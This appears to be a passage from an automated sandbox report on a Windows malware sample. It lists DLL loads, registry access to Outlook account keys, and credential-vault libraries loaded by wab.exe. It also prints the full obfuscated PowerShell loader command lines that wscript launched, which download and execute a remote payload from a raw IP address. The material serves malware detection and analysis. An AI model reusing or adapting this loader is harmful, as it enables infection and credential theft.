Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: m.Core.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.0000000008866000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 4e089\System.Core.pdb-)9 source: powershell.exe, 0000000F.00000002.1857571369.00000000088DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbG source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1856821763.000000000887A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offty", "0")
Source: Yara match File source: 0000000F.00000002.1859111594.000000000C9DD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1858724524.0000000008DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1850677246.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Ernringstilstandens)$global:Idehistoriens = [System.Text.Encoding]::ASCII.GetString($Porridgy)$global:Fremfre=$Idehistoriens.substring(322359,29063)<#Nonlinearity Duplikerer Skattesp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Solduges $Superinjection $Ufornuftigheders), (Upspout @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Conducted = [AppDomain]::CurrentDomain.GetAssemblies(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mobiliseringens)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Occidentalt, $false).DefineType($Manlikel
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Ernringstilstandens)$global:Idehistoriens = [System.Text.Encoding]::ASCII.GetString($Porridgy)$global:Fremfre=$Idehistoriens.substring(322359,29063)<#Nonlinearity Duplikerer Skattesp
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn 